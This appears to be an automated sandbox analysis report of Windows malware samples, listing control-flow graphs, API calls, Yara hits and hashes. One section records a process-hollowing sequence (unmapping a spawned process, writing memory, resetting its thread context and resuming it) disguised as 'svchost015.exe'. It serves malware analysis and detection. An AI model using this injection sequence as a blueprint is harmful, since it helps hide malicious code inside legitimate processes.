124 5b07e2 118->124 125 5b07e4-5b0822 118->125 127 5b0839-5b083c 119->127 126 5b067a-5b0689 120->126 121->122 131 5b054d-5b0550 123->131 124->119 125->113 128 5b068f-5b06b2 126->128 129 5b0750-5b077a 126->129 127->109 130 5b083e-5b0847 127->130 132 5b06ef-5b06fc 128->132 133 5b06b4-5b06ed 128->133 129->111 134 5b084b-5b086c 130->134 135 5b0849 130->135 137 5b05e0-5b05ef 131->137 138 5b0556-5b056b 131->138 139 5b074b 132->139 140 5b06fe-5b0748 132->140 133->132 134->127 135->109 137->101 141 5b056f-5b057a 138->141 142 5b056d 138->142 139->126 140->139 143 5b059b-5b05bb 141->143 144 5b057c-5b0599 141->144 142->137 149 5b05bd-5b05db 143->149 144->149 149->131
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005B024D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068696078.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_5b0000_busaafd.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: cess$kernel32.dll
                                                • API String ID: 4275171209-1230238691
                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction ID: 7551dfa21bb43cba0658288d1fd6cf974fef82f8ba6c86bf0450c771147d3be8
                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction Fuzzy Hash: 4F526874A00229DFDB64CF58C985BADBBB1BF09304F1480D9E94DAB291DB30AE85DF14

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 425 41aa64-41aa6b 426 41aa70-41aa80 425->426 427 41aa82 426->427 428 41aa87-41aa8a 426->428 427->428 428->426 429 41aa8c-41aaaf LoadLibraryW call 41a5c0 call 41a730 428->429 434 41aab0-41aab7 429->434 435 41aab9-41aac9 GlobalSize 434->435 436 41aacd-41aad3 434->436 435->436 437 41aad5 call 41a5b0 436->437 438 41aada-41aae1 436->438 437->438 439 41aae3-41aae8 InterlockedDecrement 438->439 440 41aaee-41aaf5 438->440 439->440 440->434 443 41aaf7-41ab05 440->443 444 41ab07-41ab0c 443->444 445 41ab16-41ab1c 444->445 446 41ab0e-41ab14 444->446 445->444 447 41ab1e-41ab32 445->447 446->445 446->447
                                                APIs
                                                • LoadLibraryW.KERNELBASE(0041CA54), ref: 0041AA91
                                                • GlobalSize.KERNEL32(00000000), ref: 0041AABB
                                                • InterlockedDecrement.KERNEL32(?), ref: 0041AAE8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068532173.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_40b000_busaafd.jbxd
                                                Similarity
                                                • API ID: DecrementGlobalInterlockedLibraryLoadSize
                                                • String ID: k`$}$
                                                • API String ID: 2499385582-956986773
                                                • Opcode ID: 90d5a7ab82ba47ca7eb1b4750a0015e3dea80a490ed384338c8ca6549050b500
                                                • Instruction ID: fcda37833e7166e974b459af4bde307c7f2281d154bce7f8072bdce0eb6676ce
                                                • Opcode Fuzzy Hash: 90d5a7ab82ba47ca7eb1b4750a0015e3dea80a490ed384338c8ca6549050b500
                                                • Instruction Fuzzy Hash: E31127346892508AC624A760DD457EBB761EF58356F11403FE646822A1CA7854E1CBDF

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 467 7a78c6-7a78df 468 7a78e1-7a78e3 467->468 469 7a78ea-7a78f6 CreateToolhelp32Snapshot 468->469 470 7a78e5 468->470 471 7a78f8-7a78fe 469->471 472 7a7906-7a7913 Module32First 469->472 470->469 471->472 478 7a7900-7a7904 471->478 473 7a791c-7a7924 472->473 474 7a7915-7a7916 call 7a7585 472->474 479 7a791b 474->479 478->468 478->472 479->473
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007A78EE
                                                • Module32First.KERNEL32(00000000,00000224), ref: 007A790E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068943563.00000000007A4000.00000040.00000020.00020000.00000000.sdmp, Offset: 007A4000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7a4000_busaafd.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 3833638111-0
                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction ID: 69d06cd6c17eb4673ad29fe63a15747fad1c6327218b213d0048e0a606613505
                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction Fuzzy Hash: A5F06232600714AFD7243AB59C8DB6B76E8AF8A725F100629E642910C0DB78E945C661

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 480 5b0e0f-5b0e24 SetErrorMode * 2 481 5b0e2b-5b0e2c 480->481 482 5b0e26 480->482 482->481
                                                APIs
                                                • SetErrorMode.KERNELBASE(00000400,?,?,005B0223,?,?), ref: 005B0E19
                                                • SetErrorMode.KERNELBASE(00000000,?,?,005B0223,?,?), ref: 005B0E1E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068696078.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_5b0000_busaafd.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction ID: e6f0b986f79c47f2df78b5900a9022620743f9650b9358d5e1040a707868e860
                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction Fuzzy Hash: 0FD0123114512877D7002A94DC09BCE7F1CDF05B62F008411FB0DD9080C770994046E5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 501 41a5c0-41a5e1 VirtualProtect
                                                APIs
                                                • VirtualProtect.KERNELBASE(00421D18,00421ECC,00000040,?), ref: 0041A5D8
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068532173.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_40b000_busaafd.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 659ae115ffa24a0ab265ce8b874561e83131cef61aa53958ed046fde09d19cf0
                                                • Instruction ID: fb7c44a773a415b676b39fc02758dbf11eb15df709cce15dc9b7056abff92ea5
                                                • Opcode Fuzzy Hash: 659ae115ffa24a0ab265ce8b874561e83131cef61aa53958ed046fde09d19cf0
                                                • Instruction Fuzzy Hash: 47D0A9B820020CABC210CB40EC41E22736CD788200B004268BE0C43260E671B90186A8

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 502 401869-4018cc call 40110f Sleep call 40138a 516 4018db-40192a call 40110f 502->516 517 4018ce-4018d6 call 401493 502->517 517->516
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                  • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                  • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_busaafd.jbxd
                                                Similarity
                                                • API ID: CreateDuplicateObjectSectionSleep
                                                • String ID:
                                                • API String ID: 4152845823-0
                                                • Opcode ID: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
                                                • Instruction ID: c749d285b2de24fc316c817c7ae4fe8e6badb8f794917fcf5296f62f9050bee9
                                                • Opcode Fuzzy Hash: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
                                                • Instruction Fuzzy Hash: BA117C72A0C208EBE600BA949C42E7A3259AB41755F348037BA07790F0D67D9B13B72B
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                  • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                  • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_busaafd.jbxd
                                                Similarity
                                                • API ID: CreateDuplicateObjectSectionSleep
                                                • String ID:
                                                • API String ID: 4152845823-0
                                                • Opcode ID: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
                                                • Instruction ID: b17aa293f10861f930621d71b3cc53cbab5e3b4d2edd5f2ed28ca100fb2eaa3d
                                                • Opcode Fuzzy Hash: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
                                                • Instruction Fuzzy Hash: 2C010472A0C245EBEB00ABA09C4297933659F00305F248477B606790F1D57D8712F71B
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                  • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                  • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_busaafd.jbxd
                                                Similarity
                                                • API ID: CreateDuplicateObjectSectionSleep
                                                • String ID:
                                                • API String ID: 4152845823-0
                                                • Opcode ID: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
                                                • Instruction ID: b8c0f1a70be89906461d65cd061911ad83e0312d7227b68f91b7eb194a97aeae
                                                • Opcode Fuzzy Hash: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
                                                • Instruction Fuzzy Hash: CA015A7260C205EBEB01AA909C42A7A3215AB45355F248437BA17790F1C67D8A53F71B
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                  • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                  • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_busaafd.jbxd
                                                Similarity
                                                • API ID: CreateDuplicateObjectSectionSleep
                                                • String ID:
                                                • API String ID: 4152845823-0
                                                • Opcode ID: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
                                                • Instruction ID: be550ea8b7a21d6326383ffce51d2b737e5c9e0a4d996b68b29bd2ffee87f150
                                                • Opcode Fuzzy Hash: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
                                                • Instruction Fuzzy Hash: 32014F7260C205EBEB01AA909D41A7E3255AF45315F248437BA17790F1C67D8653F71B
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007A75D6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068943563.00000000007A4000.00000040.00000020.00020000.00000000.sdmp, Offset: 007A4000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7a4000_busaafd.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction ID: f2d5e99dd5d3b5562b7d45f9a85d47872dc193266cddc3685936dbdc7573a68f
                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction Fuzzy Hash: EF113C79A00208EFDB01DF98C989E98BBF5EF08351F058094F9489B362D375EA50DF84
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                  • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                  • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_busaafd.jbxd
                                                Similarity
                                                • API ID: CreateDuplicateObjectSectionSleep
                                                • String ID:
                                                • API String ID: 4152845823-0
                                                • Opcode ID: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
                                                • Instruction ID: 2ebc05d28c21af2a54c4caf66b99915bed587d393384b69dc5fa06e125dea622
                                                • Opcode Fuzzy Hash: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
                                                • Instruction Fuzzy Hash: 50018F7260C205EBEB01AA909C41A7E3315AB45311F208437BA06790F1C67D8712F71B
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                  • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                  • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_busaafd.jbxd
                                                Similarity
                                                • API ID: CreateDuplicateObjectSectionSleep
                                                • String ID:
                                                • API String ID: 4152845823-0
                                                • Opcode ID: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
                                                • Instruction ID: 055aca88afb56c34d21ecc05ae408393a65145e0cd4b89ba36dd333808a7ed44
                                                • Opcode Fuzzy Hash: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
                                                • Instruction Fuzzy Hash: C401627260C205EBEB01AA909D51A6E3355AF45351F208437BA16790F1C67D8652F71B
                                                APIs
                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041A69C
                                                • UnhandledExceptionFilter.KERNEL32(00000000), ref: 0041A6A4
                                                • GetComputerNameW.KERNEL32(?,?), ref: 0041A6F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068532173.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_40b000_busaafd.jbxd
                                                Similarity
                                                • API ID: ComputerExceptionFilterNamePrivateProfileStringUnhandledWrite
                                                • String ID: -
                                                • API String ID: 1470029763-2547889144
                                                • Opcode ID: be8e2e4c92d4aa084a27bf65dbcb5d7ecd1ee3e5d5be1be516bfa36a37aadb6c
                                                • Instruction ID: 4b5e4e4b6f83c94ba78a0dd8dd4ce6fb1df44620f0ca627238bf55da635243b7
                                                • Opcode Fuzzy Hash: be8e2e4c92d4aa084a27bf65dbcb5d7ecd1ee3e5d5be1be516bfa36a37aadb6c
                                                • Instruction Fuzzy Hash: 7711E9319012189BD760DF64DC85BDE77F4FB08310F15C1B9E5D59B180CA745AC58F8A
                                                APIs
                                                • QueryDosDeviceW.KERNEL32(00000000,00000000,00000000,00000000,0041B044,0041AAA1), ref: 0041A74C
                                                • FreeEnvironmentStringsW.KERNEL32(00000000,00000000,0041B044,0041AAA1), ref: 0041A767
                                                • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0041A78A
                                                • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 0041A792
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068532173.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_40b000_busaafd.jbxd
                                                Similarity
                                                • API ID: AllocateDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
                                                • String ID:
                                                • API String ID: 975556166-0
                                                • Opcode ID: fcdbff5d07d9ac415359981b28a3bf4e46d87dbfd96b2b6133518f9cab96085a
                                                • Instruction ID: d58ed8a6e156ce39838269d538da37acbc757045de5b3d1f898b295708f67049
                                                • Opcode Fuzzy Hash: fcdbff5d07d9ac415359981b28a3bf4e46d87dbfd96b2b6133518f9cab96085a
                                                • Instruction Fuzzy Hash: 78F08935781200E7E6306B64EC49B863774EB18713F514032F719961F0C7A459818F5E

                                                Execution Graph

                                                Execution Coverage:51.1%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:17.1%
                                                Total number of Nodes:35
                                                Total number of Limit Nodes:1
                                                execution_graph 391 30aac00 392 30aac39 391->392 400 30aacd1 392->400 401 30a93f0 392->401 396 30aad05 419 30a9b50 396->419 398 30aad97 422 30aa090 NtAllocateVirtualMemory 398->422 402 30a9415 401->402 403 30a9b50 VirtualAlloc 402->403 404 30a94af 403->404 405 30a9529 NtCreateFile 404->405 409 30a94c1 404->409 406 30a95cb 405->406 407 30a95d4 405->407 406->407 408 30a95d6 CreateFileMappingA 406->408 407->409 410 30a965c FindCloseChangeNotification 407->410 411 30a9634 MapViewOfFile 408->411 412 30a9604 408->412 409->396 413 30a96b0 409->413 410->409 411->407 412->407 412->411 414 30a96fe 413->414 415 30a9717 414->415 416 30a97cd NtProtectVirtualMemory 414->416 415->396 428 30a9cf0 416->428 420 30a9b91 419->420 421 30a9bc4 VirtualAlloc 420->421 421->398 423 30aa120 422->423 424 30aa30a 7 API calls 423->424 425 30aa419 424->425 426 30aa47d Wow64GetThreadContext Wow64SetThreadContext ResumeThread ExitProcess 425->426 427 30aa440 WriteProcessMemory 425->427 426->400 427->425 429 30a97fc NtProtectVirtualMemory 428->429 429->415 430 30a9c70 431 30a9b50 VirtualAlloc 430->431 432 30a9c7d 431->432

                                                Callgraph

                                                Control-flow Graph

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 030AA101
                                                • CreateFileA.KERNELBASE(?,00000003,00000000,00000000,00000004,00000002,00000000), ref: 030AA331
                                                • WriteFile.KERNELBASE(00000000,?,002DA188,00000000,00000000), ref: 030AA35B
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 030AA36D
                                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 030AA3A5
                                                • NtUnmapViewOfSection.NTDLL(00000000,00400000), ref: 030AA3BF
                                                • VirtualAllocEx.KERNELBASE(00000000,00400000,?,00003000,00000040), ref: 030AA3EA
                                                • WriteProcessMemory.KERNELBASE(00000000,00400000,00000000,?,00000000), ref: 030AA40E
                                                • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 030AA470
                                                • Wow64GetThreadContext.KERNEL32(?,00010002), ref: 030AA49E
                                                • Wow64SetThreadContext.KERNEL32(?,00010002), ref: 030AA4C9
                                                • ResumeThread.KERNELBASE(?), ref: 030AA4DB
                                                • ExitProcess.KERNEL32(00000000), ref: 030AA4E8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2308518677.00000000030A9000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A9000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_30a9000_D931.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$MemoryThreadWrite$ContextCreateFileVirtualWow64$AllocAllocateChangeCloseExitFindNotificationResumeSectionUnmapView
                                                • String ID: svchost015.exe
                                                • API String ID: 2318777327-4092349249
                                                • Opcode ID: 6506a243c28140b7e605f1682fbb3a02570eb6cda3738287469a7d0f17233479
                                                • Instruction ID: 489820225a97e939e17ebe83437aa70048d805cbca82cb48856f5f6372553e63
                                                • Opcode Fuzzy Hash: 6506a243c28140b7e605f1682fbb3a02570eb6cda3738287469a7d0f17233479
                                                • Instruction Fuzzy Hash: DDE1FC74A002089FDB14CF98D895FEEB7B5BF88304F148199E608AB391D775AE85CF94

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 030A9B50: VirtualAlloc.KERNELBASE(00000000,030A94AF,00003000,00000040), ref: 030A9BD4
                                                • NtCreateFile.NTDLL(00000000,00120089,00000018,?,00000000,00000080,00000001,00000001,00000040,00000000,00000000), ref: 030A95BB
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 030A966C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2308518677.00000000030A9000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A9000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_30a9000_D931.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocChangeCloseCreateFileFindNotificationVirtual
                                                • String ID: @
                                                • API String ID: 482251274-2766056989
                                                • Opcode ID: 0b7c4ba18bb5c7031e5492e0a79fe1b78c7ef608674f7e0fe82617d7bc66c960
                                                • Instruction ID: c9555f09e0e403c8d1a98ea75f7fd51c8de778329ae6d356865e14236432591e
                                                • Opcode Fuzzy Hash: 0b7c4ba18bb5c7031e5492e0a79fe1b78c7ef608674f7e0fe82617d7bc66c960
                                                • Instruction Fuzzy Hash: 80811171A01618EFDB24DF58DC55FDAB3B5AF88700F1481E9E60DAB290D7706A84CF94

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 59 30a96b0-30a9715 call 30a92e0 62 30a971e-30a9733 59->62 63 30a9717-30a9719 59->63 65 30a973c-30a9754 62->65 66 30a9735-30a9737 62->66 64 30a9821-30a9824 63->64 67 30a975f-30a9769 65->67 66->64 68 30a976b-30a977b 67->68 69 30a97b7-30a97bb 67->69 70 30a977d-30a97b3 68->70 71 30a97b5 68->71 72 30a97c9-30a97cb 69->72 73 30a97bd-30a97c1 69->73 70->69 71->67 72->64 73->72 75 30a97c3-30a97c7 73->75 75->72 76 30a97cd-30a981c NtProtectVirtualMemory call 30a9cf0 NtProtectVirtualMemory 75->76 76->64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2308518677.00000000030A9000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A9000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_30a9000_D931.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .tex
                                                • API String ID: 0-1946526065
                                                • Opcode ID: 550378f57e0bd29913c2f3a96e12ab874d4668b693fd62ef9e030cc3a757d5d4
                                                • Instruction ID: 0925a1ea43fc58e4b6c2fe2174ebf24ff9eaf2280396754d89176517fb08d65f
                                                • Opcode Fuzzy Hash: 550378f57e0bd29913c2f3a96e12ab874d4668b693fd62ef9e030cc3a757d5d4
                                                • Instruction Fuzzy Hash: F651F475E01509EFCB44CFC8D894BEEFBB5FB48305F248599D815AB280D335AA85CBA0

                                                Control-flow Graph

                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,030A94AF,00003000,00000040), ref: 030A9BD4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2308518677.00000000030A9000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A9000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_30a9000_D931.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: VirtualAlloc
                                                • API String ID: 4275171209-164498762
                                                • Opcode ID: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                                • Instruction ID: be2228abe4b426df5a6498f027afcc5ca69e47d5eeb7173702afe66b7bfd5c7f
                                                • Opcode Fuzzy Hash: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                                • Instruction Fuzzy Hash: 2F113D60D083CDEEEB01DBE89409BEFBFB55F11704F084098D6446A282D3BA5758CBB6